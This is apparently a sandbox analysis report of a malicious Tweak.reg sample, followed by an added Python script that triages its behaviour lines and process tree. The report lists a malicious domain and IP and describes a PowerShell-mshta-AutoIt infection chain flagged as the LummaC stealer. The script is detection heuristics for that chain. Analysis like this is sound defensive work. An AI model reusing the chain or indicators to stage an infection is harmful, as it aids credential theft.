Discovery: System Information Discovery (66), Security Software Discovery (31), Virtualization/Sandbox Evasion (31), Application Window Discovery (11), File and Directory Discovery (3), Process Discovery (3), System Time Discovery (2), Account Discovery (1), System Owner/User Discovery (1)
Lateral Movement: none
Collection: Input Capture (21), Clipboard Data (3), Archive Collected Data (1), Email Collection (1)
Command and Control: Application Layer Protocol (13), Encrypted Channel (11), Ingress Tool Transfer (2), Non-Application Layer Protocol (2)
Exfiltration: none
Impact: System Shutdown/Reboot (1)

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
Behavior Graph ID: 1486296  Sample: Tweak.reg  Start date: 01/08/2024  Architecture: WINDOWS  Score: 100

Process tree reconstructed from the behavior graph. Node numbers are the graph's own; the bracketed numbers after a process are its created-files / created-registry-values counters from the legend.

Tweak.reg (node 2)
    DNS: pwsh2.pajamas-stoic-failing.lol
    Signatures: Malicious sample detected (through community Yara rule); Yara detected Powershell download and execute; Encrypted powershell cmdline option found; 3 other signatures
    powershell.exe (node 9) [11]
        Signature: Powershell drops PE file
        mshta.exe (node 19) [17]
            Network: pwsh2.pajamas-stoic-failing.lol 188.114.96.3, 443, 49730, 49738 CLOUDFLARENETUS European Union
            Dropped: C:\Users\user\AppData\Local\...\DonaldDuck[1], PE32
            Signatures: Suspicious powershell command line found; Very long command line found
            powershell.exe (node 30) [14 29]
                Dropped: C:\Users\user\AppData\Roaming\AutoIt3.exe, PE32
                Signature: Loading BitLocker PowerShell Module
                AutoIt3.exe (node 36)
                    Signature: LummaC encrypted strings found
                conhost.exe (node 39)
        conhost.exe (node 24)
    powershell.exe (node 12)
        mshta.exe (node 26) [15]
            powershell.exe (node 34)
                AutoIt3.exe (node 41)
                conhost.exe (node 43)
        conhost.exe (node 28)
    regedit.exe (node 14) [1]
        Signatures: Creates autostart registry keys with suspicious values (likely registry only malware); Creates an autostart registry key pointing to binary in C:\Windows
    svchost.exe (node 16) [1 1]
        Network: 127.0.0.1 unknown unknown
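The behavior lines above (the AutoIt3.exe reads of CentralProcessor\0 and ProductID, the socket/bind/listen code function) and the powershell -> mshta -> powershell -> AutoIt3.exe chain in the graph are the pieces an analyst turns into triage rules. The script below is an added example for this page; it is not Joe Sandbox code and is not part of the report. It assumes the exported behavior table separates the Source column from the observation with a tab, re-embeds four of the report's own lines as constructed input, and transcribes the process tree using the node numbers printed in the graph.

```python
"""Triage of Joe Sandbox style behaviour lines and a process tree.

Added example for this report, not Joe Sandbox code.  Assumptions: the
exported behaviour table separates the Source column from the observation
with a tab, and the process tree is keyed by the graph's node numbers.
"""
import re
from collections import defaultdict

# Registry values the report shows AutoIt3.exe reading.  CPU description and
# the Windows ProductId are the usual host-fingerprinting keys (ATT&CK T1082).
FINGERPRINT_KEYS = {
    r"HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID",
}

AUTOIT = r"C:\Users\user\AppData\Roaming\AutoIt3.exe"

# Constructed sample input: four behaviour lines copied from this report,
# with a tab between the Source column and the observation column.
OBSERVATIONS = [
    "Source: " + AUTOIT + "\tRegistry key value queried: "
    r"HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0",
    "Source: " + AUTOIT + "\tKey value queried: "
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID",
    "Source: " + AUTOIT + "\tCode function: 15_2_001F1DD8 socket,WSAGetLastError,"
    "bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    "\tQueries volume information: C:\\ VolumeInformation",
]

# Process tree transcribed from the behaviour graph: (node, image, parent node).
PROCESSES = [
    (2, "Tweak.reg", None),
    (9, "powershell.exe", 2), (12, "powershell.exe", 2),
    (14, "regedit.exe", 2), (16, "svchost.exe", 2),
    (19, "mshta.exe", 9), (24, "conhost.exe", 9),
    (26, "mshta.exe", 12), (28, "conhost.exe", 12),
    (30, "powershell.exe", 19), (34, "powershell.exe", 26),
    (36, "AutoIt3.exe", 30), (39, "conhost.exe", 30),
    (41, "AutoIt3.exe", 34), (43, "conhost.exe", 34),
]
# Image paths of the dropped-and-executed binaries (node -> path).
DROPPED = {36: AUTOIT, 41: AUTOIT}

OBS_RE = re.compile(r"^Source:\s*(?P<src>[^\t]+)\t(?P<kind>[^:]+):\s*(?P<detail>.*)$")
LISTEN_RE = re.compile(r"\bsocket\b.*\bbind\b.*\blisten\b")


def parse_observation(line):
    """Split one behaviour line into (source image, observation kind, detail)."""
    m = OBS_RE.match(line)
    return (m["src"].strip(), m["kind"].strip(), m["detail"].strip()) if m else None


def registry_fingerprinting(lines):
    """Map each source image to the fingerprinting registry values it read."""
    hits = defaultdict(set)
    for line in lines:
        rec = parse_observation(line)
        if (rec and rec[1] in ("Registry key value queried", "Key value queried")
                and rec[2] in FINGERPRINT_KEYS):
            hits[rec[0]].add(rec[2])
    return {src: sorted(keys) for src, keys in hits.items()}


def listening_sockets(lines):
    """(image, function address) for code functions that socket/bind/listen."""
    out = []
    for line in lines:
        rec = parse_observation(line)
        if rec and rec[1] == "Code function" and LISTEN_RE.search(rec[2]):
            out.append((rec[0], rec[2].split()[0]))
    return out


def ancestry(procs, node):
    """Image names from the root down to `node`, lower-cased."""
    by_node = {n: (img, parent) for n, img, parent in procs}
    chain = []
    while node is not None:
        img, node = by_node[node]
        chain.append(img.lower())
    return chain[::-1]


def lolbin_chains(procs, pattern=("powershell.exe", "mshta.exe", "powershell.exe")):
    """Nodes whose ancestry ends with the given LOLBin image sequence."""
    return [n for n, _, _ in procs
            if tuple(ancestry(procs, n)[-len(pattern):]) == pattern]


def dropped_executables(procs, dropped):
    """Nodes whose image was dropped into a user-writable directory and then run."""
    user_dirs = ("\\appdata\\", "\\temp\\", "\\programdata\\")
    return sorted(n for n, _, _ in procs
                  if n in dropped and any(d in dropped[n].lower() for d in user_dirs))


def triage(lines=OBSERVATIONS, procs=PROCESSES, dropped=DROPPED):
    """Combine the checks above into a list of human-readable findings."""
    findings = []
    for src, keys in registry_fingerprinting(lines).items():
        findings.append(f"T1082 host fingerprinting: {src} read {len(keys)} registry value(s)")
    for src, func in listening_sockets(lines):
        findings.append(f"listening socket opened by {src} in function {func}")
    for n in lolbin_chains(procs):
        findings.append(f"powershell -> mshta -> powershell chain ends at node {n}")
    for n in dropped_executables(procs, dropped):
        findings.append(f"dropped PE executed from user-writable path: node {n} ({dropped[n]})")
    return findings


if __name__ == "__main__":
    for finding in triage():
        print(finding)
```

The chain check matches on the tail of each process's ancestry rather than on a parent/child pair, so the second branch of the graph (node 12 -> 26 -> 34) is caught as well even though it carries no signature of its own; the volume-information line is parsed but produces no finding, which is the intended behaviour for benign-looking noise.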
